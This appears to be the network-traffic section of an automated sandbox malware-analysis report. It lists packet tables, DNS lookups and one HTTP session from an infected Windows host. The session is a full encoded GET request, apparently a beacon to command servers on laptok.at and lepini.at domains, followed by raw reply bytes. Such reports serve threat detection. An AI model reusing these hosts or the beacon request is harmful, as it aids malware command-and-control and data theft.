Feb 12, 2021 01:50:15.314043045 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314086914 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314124107 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314138889 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314167023 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314207077 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314219952 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314246893 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314285994 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314300060 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314327002 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314374924 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314378023 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314419985 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314457893 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314471006 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314507008 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314567089 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314574957 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314618111 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314656019 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314675093 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314697027 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314735889 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314743996 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314774036 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314812899 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314821005 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314851999 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314899921 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.314898968 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314944029 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314975023 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314992905 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.315028906 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.315408945 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.393450022 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:19.754209042 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:19.922120094 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:25.619970083 CET	49775	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:25.694845915 CET	80	49775	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:25.694947958 CET	49775	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:25.695081949 CET	49775	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:25.695106983 CET	49775	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:25.775444984 CET	80	49775	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:26.090323925 CET	80	49775	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:26.090446949 CET	49775	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:26.090503931 CET	49775	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:26.166276932 CET	80	49775	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:29.445563078 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:29.523812056 CET	49732	443	192.168.2.4	87.248.118.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2021 01:47:00.364090919 CET	62286	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:00.425414085 CET	53	62286	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:01.284912109 CET	65195	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:01.344284058 CET	53	65195	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:01.565716028 CET	59042	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:01.625843048 CET	53	59042	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:01.994728088 CET	56483	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:02.015269995 CET	51025	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:02.059798002 CET	53	56483	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:02.073493004 CET	53	51025	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:03.635760069 CET	61516	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:03.710735083 CET	53	61516	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:03.906444073 CET	49182	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:03.955038071 CET	53	49182	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:03.979238987 CET	59920	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:04.050385952 CET	53	59920	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:05.029134035 CET	57458	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:05.096091986 CET	53	57458	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:05.795938969 CET	50579	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:05.864603996 CET	53	50579	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:06.326078892 CET	51703	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:06.384717941 CET	53	51703	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:06.619769096 CET	65248	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:06.678131104 CET	53	65248	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:07.606296062 CET	53723	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:07.625605106 CET	64646	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:07.655306101 CET	53	53723	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:07.682765961 CET	53	64646	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:09.692598104 CET	65298	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:09.743731022 CET	53	65298	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:30.328049898 CET	59123	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:30.388215065 CET	53	59123	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:31.046531916 CET	54531	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:31.106641054 CET	53	54531	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:31.333369970 CET	59123	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:31.390448093 CET	53	59123	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:31.521361113 CET	49714	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:31.570075035 CET	53	49714	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:32.080183029 CET	54531	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:32.140381098 CET	53	54531	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:32.596908092 CET	59123	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:32.653915882 CET	53	59123	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:33.090537071 CET	54531	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:33.153295994 CET	53	54531	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:33.851422071 CET	58028	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:33.900324106 CET	53	58028	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:34.602392912 CET	59123	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:34.660726070 CET	53	59123	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:34.951616049 CET	53097	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:35.003283024 CET	53	53097	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:35.103874922 CET	54531	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:35.156644106 CET	53	54531	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:36.487644911 CET	49257	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:36.536304951 CET	53	49257	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:37.528908014 CET	62389	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:37.588789940 CET	53	62389	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:38.612901926 CET	59123	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:38.634602070 CET	49910	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:38.670018911 CET	53	59123	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:38.683402061 CET	53	49910	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:39.114711046 CET	54531	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:39.174766064 CET	53	54531	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:39.974467039 CET	55854	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:40.026135921 CET	53	55854	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:41.045123100 CET	64549	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:41.113461971 CET	53	64549	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:42.074331999 CET	63153	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:42.132729053 CET	53	63153	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:43.159709930 CET	52991	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:43.210843086 CET	53	52991	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:44.234641075 CET	53700	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:44.286366940 CET	53	53700	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:45.301829100 CET	51726	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:45.353522062 CET	53	51726	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:46.534862041 CET	56794	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:46.586219072 CET	53	56794	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:47.175636053 CET	56534	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:47.234330893 CET	53	56534	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:47.666733027 CET	56627	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:47.718324900 CET	53	56627	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:48.794568062 CET	56621	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:48.843529940 CET	53	56621	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:50.191190958 CET	63116	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:50.248228073 CET	53	63116	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:51.289062977 CET	64078	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:51.349013090 CET	53	64078	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:52.424865961 CET	64801	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:52.473594904 CET	53	64801	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:53.545249939 CET	61721	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:53.593975067 CET	53	61721	8.8.8.8	192.168.2.4
Feb 12, 2021 01:47:54.618580103 CET	51255	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:47:54.671813011 CET	53	51255	8.8.8.8	192.168.2.4
Feb 12, 2021 01:48:00.255012035 CET	61522	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:48:00.661688089 CET	53	61522	8.8.8.8	192.168.2.4
Feb 12, 2021 01:48:03.436378002 CET	52337	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:48:03.830491066 CET	53	52337	8.8.8.8	192.168.2.4
Feb 12, 2021 01:48:06.895785093 CET	55046	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:48:06.953541040 CET	53	55046	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:10.512964010 CET	49612	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:10.728384972 CET	49285	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:10.777154922 CET	53	49285	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:10.901073933 CET	53	49612	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:10.907104969 CET	50601	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:10.958833933 CET	53	50601	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:10.988004923 CET	60875	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:11.045125008 CET	53	60875	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:11.749787092 CET	56448	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:11.800775051 CET	53	56448	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:12.551882982 CET	59172	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:12.608894110 CET	53	59172	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:13.599351883 CET	62420	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:14.035474062 CET	53	62420	8.8.8.8	192.168.2.4
Feb 12, 2021 01:50:25.557796955 CET	60579	53	192.168.2.4	8.8.8.8
Feb 12, 2021 01:50:25.619008064 CET	53	60579	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 12, 2021 01:47:01.565716028 CET	192.168.2.4	8.8.8.8	0xb0ac	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:03.635760069 CET	192.168.2.4	8.8.8.8	0xf373	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:03.906444073 CET	192.168.2.4	8.8.8.8	0x1439	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:03.979238987 CET	192.168.2.4	8.8.8.8	0xa096	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:05.029134035 CET	192.168.2.4	8.8.8.8	0xda75	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:05.795938969 CET	192.168.2.4	8.8.8.8	0x86d2	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:06.326078892 CET	192.168.2.4	8.8.8.8	0x5e32	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:06.619769096 CET	192.168.2.4	8.8.8.8	0xfdb5	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.606296062 CET	192.168.2.4	8.8.8.8	0xb293	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.625605106 CET	192.168.2.4	8.8.8.8	0x290f	Standard query (0)	s.yimg.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:48:00.255012035 CET	192.168.2.4	8.8.8.8	0x2fa7	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:48:03.436378002 CET	192.168.2.4	8.8.8.8	0xb136	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:48:06.895785093 CET	192.168.2.4	8.8.8.8	0xf0e6	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.512964010 CET	192.168.2.4	8.8.8.8	0x18e0	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.728384972 CET	192.168.2.4	8.8.8.8	0x46f8	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.907104969 CET	192.168.2.4	8.8.8.8	0xf5ac	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.988004923 CET	192.168.2.4	8.8.8.8	0x2909	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:11.749787092 CET	192.168.2.4	8.8.8.8	0x3422	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:12.551882982 CET	192.168.2.4	8.8.8.8	0xf7f7	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:13.599351883 CET	192.168.2.4	8.8.8.8	0xd3f	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:25.557796955 CET	192.168.2.4	8.8.8.8	0x88b	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 12, 2021 01:47:01.625843048 CET	8.8.8.8	192.168.2.4	0xb0ac	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:03.710735083 CET	8.8.8.8	192.168.2.4	0xf373	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:03.955038071 CET	8.8.8.8	192.168.2.4	0x1439	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:03.955038071 CET	8.8.8.8	192.168.2.4	0x1439	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:04.050385952 CET	8.8.8.8	192.168.2.4	0xa096	No error (0)	contextual.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:05.096091986 CET	8.8.8.8	192.168.2.4	0xda75	No error (0)	lg3.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:05.864603996 CET	8.8.8.8	192.168.2.4	0x86d2	No error (0)	hblg.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:06.384717941 CET	8.8.8.8	192.168.2.4	0x5e32	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:06.678131104 CET	8.8.8.8	192.168.2.4	0xfdb5	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:06.678131104 CET	8.8.8.8	192.168.2.4	0xfdb5	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:07.655306101 CET	8.8.8.8	192.168.2.4	0xb293	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:07.655306101 CET	8.8.8.8	192.168.2.4	0xb293	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.655306101 CET	8.8.8.8	192.168.2.4	0xb293	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.655306101 CET	8.8.8.8	192.168.2.4	0xb293	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.655306101 CET	8.8.8.8	192.168.2.4	0xb293	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.682765961 CET	8.8.8.8	192.168.2.4	0x290f	No error (0)	s.yimg.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2021 01:47:07.682765961 CET	8.8.8.8	192.168.2.4	0x290f	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Feb 12, 2021 01:47:07.682765961 CET	8.8.8.8	192.168.2.4	0x290f	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Feb 12, 2021 01:48:00.661688089 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	api10.laptok.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:48:03.830491066 CET	8.8.8.8	192.168.2.4	0xb136	No error (0)	api10.laptok.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:48:06.953541040 CET	8.8.8.8	192.168.2.4	0xf0e6	No error (0)	api10.laptok.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.777154922 CET	8.8.8.8	192.168.2.4	0x46f8	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.901073933 CET	8.8.8.8	192.168.2.4	0x18e0	No error (0)	c56.lepini.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:10.958833933 CET	8.8.8.8	192.168.2.4	0xf5ac	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:11.045125008 CET	8.8.8.8	192.168.2.4	0x2909	No error (0)	api3.lepini.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:11.800775051 CET	8.8.8.8	192.168.2.4	0x3422	No error (0)	api3.lepini.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:12.608894110 CET	8.8.8.8	192.168.2.4	0xf7f7	No error (0)	api3.lepini.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:14.035474062 CET	8.8.8.8	192.168.2.4	0xd3f	No error (0)	api3.lepini.at		35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 01:50:25.619008064 CET	8.8.8.8	192.168.2.4	0x88b	No error (0)	api3.lepini.at		35.228.31.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49762	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:48:00.766551018 CET	3008	OUT	GET /api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZGfgnzwsY_2FSQ_2F3/a2GGZduez/SqOtvGRODR9NxK4_2F3R/2gP8hWIKAYYweque45c/mmo1QCYZVFeP5qFtRQW3rp/ESP8Dg0JYvi4a/zzwdg1Ba/kVPhJOlEUkXV9nZ6TtxGPu4/gqcL2pxbRo/OD4R3VuLXH9TB9ksT/J7YsghyQco_2/BonnsCX3QSq/e_2FlgvYSOP02Q/dsGMQxaYUUX012u0t5_2F/50UM82sSS5a5iW39/tnrjay9bJzCbz3PtHnh/d HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 01:48:01.264964104 CET	3009	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:48:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 35 92 e4 00 10 04 1f 24 43 4c a6 18 47 cc 9e 98 99 f5 fa db 73 27 36 46 31 ea ee aa 4c 63 4d 67 3a f4 21 1e 6d c3 9e bb fb 5b 4a 92 c2 7f 89 cb bb a7 60 4b 27 c2 42 e5 50 d2 1b 73 10 9a 1b de 8d 61 7e 09 26 10 d1 f5 60 7c ce f3 e9 0f f4 bc fc dc 59 7e 45 72 48 3a da a3 20 70 38 71 bd 97 2e b5 a9 80 d4 8f 49 55 68 51 82 37 10 a0 5e da d7 41 4e d4 75 0d 45 0e 82 d4 01 24 c3 b2 9b 05 4e d7 2d eb 27 55 cb 44 1f bb de ad 3f ba 47 ff 3e 5b 9c 11 e7 bc 23 06 b4 fd 93 9e ad f5 ca a7 e2 a1 62 75 76 60 14 98 fd 30 4c 5f 6b bf 36 14 f7 94 c0 e8 8a 65 2d 7f 8e 07 61 ca 34 82 52 be ce b0 c0 8f 57 a1 55 7c a3 fc d3 d0 82 bb 0f 24 9e d5 19 59 22 1c 5f 0f 26 94 d3 07 02 19 16 7d 23 ae 43 7f 66 0c 74 97 8a fa 37 4e 09 a6 8a 67 ae 94 e3 a4 87 44 22 c2 a8 dd 8f 4e 9c c3 3a 37 0d 49 fd 64 84 a6 f3 27 95 c3 2f 05 6c f4 0e 38 63 63 ad f3 4c 7b 07 93 f6 0d 17 f6 45 b3 21 7e b2 58 4a 83 6a c2 91 4e e5 f9 50 54 0e d4 02 bf a3 df 81 de 72 36 62 f2 84 f2 98 31 8d 9f d3 d0 43 19 c1 ad 27 c0 24 7b 3e 4b 4f ce ee e4 33 52 f6 35 7d f9 f5 af 73 5f 02 67 2e 83 27 cd ac 3a 8b 40 cd fb 8a 1c 51 ea 86 a6 e7 3a 99 0a d3 7b 09 a0 b1 6a 7c c4 27 76 a4 9e 9b e8 46 0d ab b2 12 d6 77 6e dd b2 b6 50 a4 3d e7 d9 e7 3d 10 d1 be 17 ab b3 9e d9 a2 27 c6 77 0b 79 41 95 04 41 10 8b e3 77 49 5d 4b 14 45 a5 e9 5e ab bb b3 90 86 82 5d 7b fd 2d c6 e7 e2 a1 43 79 e8 a6 6f c1 82 27 07 fa 6a d6 86 c9 d9 4f b5 ac 15 29 cc aa a4 18 80 12 c9 ee 25 0d d1 bc c1 9b 1e 49 3d f5 7b 3d db 18 49 65 64 70 58 6e 63 1f 3a 5b 78 e6 36 2e 92 93 92 47 c1 a9 c6 e7 31 59 39 fa c1 7c df e3 0c 9c 56 6a 59 2b ca 43 5f 77 5e 37 1a f0 80 5e e6 ba be 28 dd 1c 84 bc 4a 1e ac ca 82 1d 6f 93 27 6b c0 e4 34 99 0f 95 9c 07 2a f9 73 83 44 59 de c6 dd 85 32 0e b0 f6 81 9c 97 9f cb 67 34 40 57 3c 92 e4 ee 1f 3a 28 f2 cd cf a5 ec a4 99 5f 27 ce 6a 17 7d b8 3f 53 cc 11 6b 10 32 a7 06 d2 03 3f 71 d4 89 26 66 15 71 c0 e1 14 64 21 b9 4d 8e 61 3a ed 7a cc 48 d9 57 26 94 e4 90 97 47 8b f9 6c 91 0b 60 bf 15 50 e8 f0 ed 60 a0 ed d7 70 b6 05 f4 f5 1a 4c 63 b4 a3 a4 c9 4a d7 dc d7 b0 10 e5 e2 c0 b2 5f 40 b0 84 e0 86 d9 11 79 fe db 4d 62 11 d3 66 17 9c 48 4f 40 91 c9 e6 6d 2b ad ac d3 8b a4 62 f1 89 e3 93 4c b3 ea 2f 72 32 c5 5a 7b a9 0f 96 70 eb 58 bb 60 a6 fc 17 8b d0 4c 2e 31 6a bd 55 74 89 b8 f9 a0 32 f3 1d 12 9c 57 7e a1 f7 19 84 f0 2a cd f5 0e ee e7 69 3d 94 ca 0d bb cb da 9c e4 8e 46 cc 8b 6a 1b 0d 1a b9 bf 5a 6b 29 79 3f 03 af 30 70 54 8d fb 0c 36 55 7a 94 62 15 6b 61 7a 9a 88 e8 63 5c a1 1a ba ce 54 1e 4d 77 84 d7 b2 87 b9 cd 38 11 65 da 3a 80 5f 0f ff 32 95 f8 a8 9d 8f 45 cf 2b 99 f9 f3 af bd 4a 2c c3 dd 58 e0 35 39 7f d6 95 9b a0 a5 c1 f4 cc 19 02 7e 73 52 63 d7 23 f9 f8 8e 50 af 0f c5 34 11 ac 3b 43 46 6f ae ad 2c 9a 36 19 89 6e 03 d7 bd fa d9 d9 ae 5a 52 12 e1 6b 7b 57 f0 8d aa 3e 01 fa c9 5e 06 2c fb a9 48 ca 7c 27 7a 8a 0c 5e bb 2a 26 f7 c8 e7 ce f7 63 42 71 50 b4 20 98 bc ed fb a4 e4 99 29 88 7a dc 71 0c b3 92 79 c8 f3 77 e8 ff a6 bb b0 4a 76 11 f2 8f 32 ef 42 a2 3a 71 f3 ef 48 12 70 c4 37 b1 9f ea 77 f8 48 6f 8a bb 05 28 d6 a4 87 b9 42 60 b2 fe 08 c0 62 9c c0 e1 15 e0 ad 5a 54 55 Data Ascii: 